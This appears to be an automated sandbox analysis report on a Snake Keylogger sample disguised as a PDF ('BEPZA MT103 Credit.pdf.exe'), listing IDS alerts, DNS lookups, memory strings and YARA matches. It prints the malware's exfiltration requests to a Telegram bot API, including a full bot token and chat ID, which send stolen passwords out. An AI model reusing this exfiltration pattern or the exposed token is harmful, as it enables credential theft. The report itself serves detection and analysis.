Source: Network traffic	Suricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.5:49698 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.5:49699 -> 149.154.167.220:443

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Source: global traffic	HTTP traffic detected: GET /xml/89.187.171.161 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/89.187.171.161 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot7637203109:AAEwF0h434NduLaTadsXsSgHvM5K6b5snDs/sendDocument?chat_id=7135428463&caption=user%20/%20Passwords%20/%2089.187.171.161 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd7c32738635eaHost: api.telegram.orgContent-Length: 1095Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot7637203109:AAEwF0h434NduLaTadsXsSgHvM5K6b5snDs/sendDocument?chat_id=7135428463&caption=user%20/%20Passwords%20/%2089.187.171.161 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd7c3273964b09Host: api.telegram.orgContent-Length: 1095Connection: Keep-Alive

Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View	IP Address: 104.21.80.1 104.21.80.1
Source: Joe Sandbox View	IP Address: 104.21.80.1 104.21.80.1

Source: Joe Sandbox View	JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: reallyfreegeoip.org

Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49689 -> 132.226.247.73:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49693 -> 132.226.247.73:80

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org

Source: unknown	HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.5:49695 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.5:49696 version: TLS 1.0

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /xml/89.187.171.161 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/89.187.171.161 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org

Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org

Source: unknown

HTTP traffic detected: POST /bot7637203109:AAEwF0h434NduLaTadsXsSgHvM5K6b5snDs/sendDocument?chat_id=7135428463&caption=user%20/%20Passwords%20/%2089.187.171.161 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd7c32738635eaHost: api.telegram.orgContent-Length: 1095Connection: Keep-Alive

Source: BEPZA MT103 Credit.pdf.exe, 0000000A.00000002.3715408005.0000000002EC4000.00000004.00000800.00020000.00000000.sdmp, YEGIgzyAhkvT.exe, 00000010.00000002.3714406574.0000000002E44000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://api.telegram.org
Source: BEPZA MT103 Credit.pdf.exe, 0000000A.00000002.3715408005.0000000002EC4000.00000004.00000800.00020000.00000000.sdmp, YEGIgzyAhkvT.exe, 00000010.00000002.3714406574.0000000002E44000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://api.telegram.orgd
Source: BEPZA MT103 Credit.pdf.exe, 0000000A.00000002.3715408005.0000000002DEE000.00000004.00000800.00020000.00000000.sdmp, YEGIgzyAhkvT.exe, 00000010.00000002.3714406574.0000000002D6E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.com
Source: BEPZA MT103 Credit.pdf.exe, 0000000A.00000002.3715408005.0000000002DEE000.00000004.00000800.00020000.00000000.sdmp, YEGIgzyAhkvT.exe, 00000010.00000002.3714406574.0000000002D6E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.comd
Source: BEPZA MT103 Credit.pdf.exe, 0000000A.00000002.3715408005.0000000002DEE000.00000004.00000800.00020000.00000000.sdmp, BEPZA MT103 Credit.pdf.exe, 0000000A.00000002.3715408005.0000000002EC4000.00000004.00000800.00020000.00000000.sdmp, BEPZA MT103 Credit.pdf.exe, 0000000A.00000002.3715408005.0000000002DD9000.00000004.00000800.00020000.00000000.sdmp, YEGIgzyAhkvT.exe, 00000010.00000002.3714406574.0000000002D5C000.00000004.00000800.00020000.00000000.sdmp, YEGIgzyAhkvT.exe, 00000010.00000002.3714406574.0000000002E44000.00000004.00000800.00020000.00000000.sdmp, YEGIgzyAhkvT.exe, 00000010.00000002.3714406574.0000000002D6E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: BEPZA MT103 Credit.pdf.exe, 0000000A.00000002.3715408005.0000000002D71000.00000004.00000800.00020000.00000000.sdmp, YEGIgzyAhkvT.exe, 00000010.00000002.3714406574.0000000002CF1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: BEPZA MT103 Credit.pdf.exe, 0000000A.00000002.3715408005.0000000002DEE000.00000004.00000800.00020000.00000000.sdmp, BEPZA MT103 Credit.pdf.exe, 0000000A.00000002.3715408005.0000000002EC4000.00000004.00000800.00020000.00000000.sdmp, YEGIgzyAhkvT.exe, 00000010.00000002.3714406574.0000000002E44000.00000004.00000800.00020000.00000000.sdmp, YEGIgzyAhkvT.exe, 00000010.00000002.3714406574.0000000002D6E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/d
Source: BEPZA MT103 Credit.pdf.exe, 00000000.00000002.1285558357.00000000040F9000.00000004.00000800.00020000.00000000.sdmp, YEGIgzyAhkvT.exe, 00000010.00000002.3710711745.0000000000413000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/q
Source: BEPZA MT103 Credit.pdf.exe, 0000000A.00000002.3715408005.0000000002DEE000.00000004.00000800.00020000.00000000.sdmp, YEGIgzyAhkvT.exe, 00000010.00000002.3714406574.0000000002D6E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.orgd
Source: BEPZA MT103 Credit.pdf.exe, 0000000A.00000002.3718729312.0000000006450000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.m1
Source: BEPZA MT103 Credit.pdf.exe, 0000000A.00000002.3715408005.0000000002E0B000.00000004.00000800.00020000.00000000.sdmp, YEGIgzyAhkvT.exe, 00000010.00000002.3714406574.0000000002D8B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://reallyfreegeoip.org
Source: BEPZA MT103 Credit.pdf.exe, 0000000A.00000002.3715408005.0000000002E0B000.00000004.00000800.00020000.00000000.sdmp, YEGIgzyAhkvT.exe, 00000010.00000002.3714406574.0000000002D8B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://reallyfreegeoip.orgd
Source: BEPZA MT103 Credit.pdf.exe, 00000000.00000002.1284942009.00000000030F1000.00000004.00000800.00020000.00000000.sdmp, BEPZA MT103 Credit.pdf.exe, 0000000A.00000002.3715408005.0000000002D71000.00000004.00000800.00020000.00000000.sdmp, YEGIgzyAhkvT.exe, 0000000B.00000002.1310845235.0000000002DC1000.00000004.00000800.00020000.00000000.sdmp, YEGIgzyAhkvT.exe, 00000010.00000002.3714406574.0000000002CF1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: BEPZA MT103 Credit.pdf.exe, 0000000A.00000002.3715408005.0000000002EC4000.00000004.00000800.00020000.00000000.sdmp, YEGIgzyAhkvT.exe, 00000010.00000002.3714406574.0000000002E44000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: BEPZA MT103 Credit.pdf.exe, 0000000A.00000002.3715408005.0000000002EC4000.00000004.00000800.00020000.00000000.sdmp, YEGIgzyAhkvT.exe, 00000010.00000002.3714406574.0000000002E44000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: BEPZA MT103 Credit.pdf.exe, 00000000.00000002.1285558357.00000000040F9000.00000004.00000800.00020000.00000000.sdmp, YEGIgzyAhkvT.exe, 00000010.00000002.3710711745.0000000000413000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot-/sendDocument?chat_id=
Source: YEGIgzyAhkvT.exe, 00000010.00000002.3714406574.0000000002E44000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot7637203109:AAEwF0h434NduLaTadsXsSgHvM5K6b5snDs/sendDocument?chat_id=7135
Source: BEPZA MT103 Credit.pdf.exe, 0000000A.00000002.3715408005.0000000002DEE000.00000004.00000800.00020000.00000000.sdmp, YEGIgzyAhkvT.exe, 00000010.00000002.3714406574.0000000002D6E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
Source: BEPZA MT103 Credit.pdf.exe, 00000000.00000002.1285558357.00000000040F9000.00000004.00000800.00020000.00000000.sdmp, BEPZA MT103 Credit.pdf.exe, 0000000A.00000002.3715408005.0000000002DEE000.00000004.00000800.00020000.00000000.sdmp, YEGIgzyAhkvT.exe, 00000010.00000002.3710711745.0000000000413000.00000040.00000400.00020000.00000000.sdmp, YEGIgzyAhkvT.exe, 00000010.00000002.3714406574.0000000002D6E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: BEPZA MT103 Credit.pdf.exe, 0000000A.00000002.3715408005.0000000002DEE000.00000004.00000800.00020000.00000000.sdmp, YEGIgzyAhkvT.exe, 00000010.00000002.3714406574.0000000002D6E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/89.187.171.161d
Source: BEPZA MT103 Credit.pdf.exe, 0000000A.00000002.3715408005.0000000002DEE000.00000004.00000800.00020000.00000000.sdmp, YEGIgzyAhkvT.exe, 00000010.00000002.3714406574.0000000002D6E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/89.187.171.161l

Source: unknown	Network traffic detected: HTTP traffic on port 49698 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49699 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49699
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49698
Source: unknown	Network traffic detected: HTTP traffic on port 49695 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49696
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49695
Source: unknown	Network traffic detected: HTTP traffic on port 49696 -> 443

Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49699 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49698 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Contains functionality to log keystrokes (.Net Source)

Source: 0.2.BEPZA MT103 Credit.pdf.exe.415c6d8.2.raw.unpack, UltraSpeed.cs	.Net Code: VKCodeToUnicode
Source: 0.2.BEPZA MT103 Credit.pdf.exe.41734f8.3.raw.unpack, UltraSpeed.cs	.Net Code: VKCodeToUnicode

System Summary

Malicious sample detected (through community Yara rule)

Source: 10.2.BEPZA MT103 Credit.pdf.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.BEPZA MT103 Credit.pdf.exe.415c6d8.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.BEPZA MT103 Credit.pdf.exe.41734f8.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.BEPZA MT103 Credit.pdf.exe.415c6d8.2.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.BEPZA MT103 Credit.pdf.exe.41734f8.3.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.BEPZA MT103 Credit.pdf.exe.41734f8.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.BEPZA MT103 Credit.pdf.exe.415c6d8.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000000.00000002.1285558357.00000000040F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: BEPZA MT103 Credit.pdf.exe PID: 8092, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: BEPZA MT103 Credit.pdf.exe PID: 4012, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown

Initial sample is a PE file and has a suspicious name

Source: initial sample

Static PE information: Filename: BEPZA MT103 Credit.pdf.exe

Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe	Code function: 0_2_02FB4B00	0_2_02FB4B00
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe	Code function: 0_2_02FBD3C4	0_2_02FBD3C4
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe	Code function: 0_2_05658890	0_2_05658890
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe	Code function: 0_2_05650040	0_2_05650040
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe	Code function: 0_2_05650006	0_2_05650006
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe	Code function: 0_2_0565D5B3	0_2_0565D5B3
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe	Code function: 0_2_077B5E00	0_2_077B5E00
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe	Code function: 0_2_077BB0E0	0_2_077BB0E0
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe	Code function: 0_2_077BE942	0_2_077BE942
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe	Code function: 0_2_07C57750	0_2_07C57750
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe	Code function: 0_2_07C57760	0_2_07C57760
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe	Code function: 0_2_07C55618	0_2_07C55618
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe	Code function: 0_2_07C55628	0_2_07C55628
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe	Code function: 0_2_07C56D50	0_2_07C56D50
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe	Code function: 0_2_07C56D60	0_2_07C56D60
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe	Code function: 0_2_07C5D560	0_2_07C5D560
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe	Code function: 0_2_07C55A60	0_2_07C55A60
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe	Code function: 0_2_07C551F0	0_2_07C551F0
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe	Code function: 0_2_07C5E9A8	0_2_07C5E9A8
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe	Code function: 10_2_02B9C530	10_2_02B9C530
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe	Code function: 10_2_02B99480	10_2_02B99480
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe	Code function: 10_2_02B9C521	10_2_02B9C521
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe	Code function: 10_2_02B92DDB	10_2_02B92DDB
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe	Code function: 10_2_02B9946F	10_2_02B9946F
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe	Code function: 10_2_06BD60F7	10_2_06BD60F7
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe	Code function: 10_2_06BD5DB4	10_2_06BD5DB4
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe	Code function: 10_2_06BDB650	10_2_06BDB650
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe	Code function: 10_2_06BD31A8	10_2_06BD31A8
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe	Code function: 10_2_06BD6C71	10_2_06BD6C71
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe	Code function: 10_2_06BD4A60	10_2_06BD4A60
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe	Code function: 11_2_0136D3C4	11_2_0136D3C4
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe	Code function: 11_2_07485E00	11_2_07485E00
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe	Code function: 11_2_0748B0E0	11_2_0748B0E0
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe	Code function: 11_2_0748E942	11_2_0748E942
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe	Code function: 11_2_07887750	11_2_07887750
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe	Code function: 11_2_07887760	11_2_07887760
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe	Code function: 11_2_07885618	11_2_07885618
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe	Code function: 11_2_07885628	11_2_07885628
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe	Code function: 11_2_0788DD00	11_2_0788DD00
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe	Code function: 11_2_07886D50	11_2_07886D50
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe	Code function: 11_2_07886D60	11_2_07886D60
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe	Code function: 11_2_0788CCC0	11_2_0788CCC0
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe	Code function: 11_2_07885A60	11_2_07885A60
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe	Code function: 11_2_078851F0	11_2_078851F0
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe	Code function: 16_2_0126C530	16_2_0126C530
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe	Code function: 16_2_01262DD1	16_2_01262DD1
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe	Code function: 16_2_01269480	16_2_01269480
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe	Code function: 16_2_0126C521	16_2_0126C521
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe	Code function: 16_2_0126946F	16_2_0126946F
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe	Code function: 16_2_06C05DB4	16_2_06C05DB4
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe	Code function: 16_2_06C0B650	16_2_06C0B650
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe	Code function: 16_2_06C031A8	16_2_06C031A8
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe	Code function: 16_2_06C06C71	16_2_06C06C71
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe	Code function: 16_2_06C04A60	16_2_06C04A60

Source: BEPZA MT103 Credit.pdf.exe, 00000000.00000002.1290497028.0000000008160000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameMontero.dll8 vs BEPZA MT103 Credit.pdf.exe
Source: BEPZA MT103 Credit.pdf.exe, 00000000.00000000.1263065941.0000000000DE2000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameIHia.exe0 vs BEPZA MT103 Credit.pdf.exe
Source: BEPZA MT103 Credit.pdf.exe, 00000000.00000002.1283020258.000000000140E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs BEPZA MT103 Credit.pdf.exe
Source: BEPZA MT103 Credit.pdf.exe, 00000000.00000002.1285558357.00000000040F9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameCloudServices.exe< vs BEPZA MT103 Credit.pdf.exe
Source: BEPZA MT103 Credit.pdf.exe, 00000000.00000002.1285558357.00000000040F9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMontero.dll8 vs BEPZA MT103 Credit.pdf.exe
Source: BEPZA MT103 Credit.pdf.exe, 00000000.00000002.1284942009.00000000030F1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameCloudServices.exe< vs BEPZA MT103 Credit.pdf.exe
Source: BEPZA MT103 Credit.pdf.exe, 0000000A.00000002.3710700225.000000000041A000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameCloudServices.exe< vs BEPZA MT103 Credit.pdf.exe
Source: BEPZA MT103 Credit.pdf.exe, 0000000A.00000002.3711387177.0000000000BC7000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameUNKNOWN_FILET vs BEPZA MT103 Credit.pdf.exe
Source: BEPZA MT103 Credit.pdf.exe	Binary or memory string: OriginalFilenameIHia.exe0 vs BEPZA MT103 Credit.pdf.exe

Source: BEPZA MT103 Credit.pdf.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 10.2.BEPZA MT103 Credit.pdf.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.BEPZA MT103 Credit.pdf.exe.415c6d8.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.BEPZA MT103 Credit.pdf.exe.41734f8.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.BEPZA MT103 Credit.pdf.exe.415c6d8.2.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.BEPZA MT103 Credit.pdf.exe.41734f8.3.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.BEPZA MT103 Credit.pdf.exe.41734f8.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.BEPZA MT103 Credit.pdf.exe.415c6d8.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000000.00000002.1285558357.00000000040F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: BEPZA MT103 Credit.pdf.exe PID: 8092, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: BEPZA MT103 Credit.pdf.exe PID: 4012, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23

